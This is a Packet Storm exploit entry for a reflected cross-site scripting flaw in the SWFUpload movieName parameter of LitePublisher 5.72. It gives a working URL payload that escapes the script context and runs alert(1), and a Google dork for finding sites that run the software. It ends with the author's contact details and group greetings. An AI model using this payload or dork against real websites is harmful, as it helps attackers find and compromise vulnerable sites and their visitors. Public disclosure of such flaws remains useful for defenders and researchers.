litepublisher 5.72 Cross Site Scripting

2014-03-19T00:00:00
ID PACKETSTORM:125783
Type packetstorm
Reporter Hossein Hezami
Modified 2014-03-19T00:00:00

Description

                                        
                                            `#######################################################################  
#  
# Exploit Title: litepublisher 5.72 SWFUpload movieName Cross Site Scripting  
# Date: 2014 18 March  
# Author: Dr.3v1l  
# Vendor Homepage: http://litepublisher.com  
# Version : 5.72  
# Tested on: Windows  
# Category: webapps  
# Google Dork: intext:"Powered by Lite Publisher"  
#  
#######################################################################  
#  
# [+] Exploit :  
#  
# http://<server>/litepublisher.5.72/js/swfupload/swfupload.swf??movieName=[XSS]  
#  
# http://<server>/litepublisher.5.72/js/swfupload/swfupload.swf??movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//  
#  
#######################################################################  
#  
# [+] Contact Me :  
#  
# B.Devils.B@gmail.com  
# Twitter.com/Doctor_3v1l  
# Facebook.com/bdb.0web  
# Facebook.com/groups/1427166220843499/  
# IR.linkedin.com/in/hossein3v1l  
# Hossein Hezami - Black_Devils B0ys  
#  
#######################################################################  
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam  
#######################################################################  
`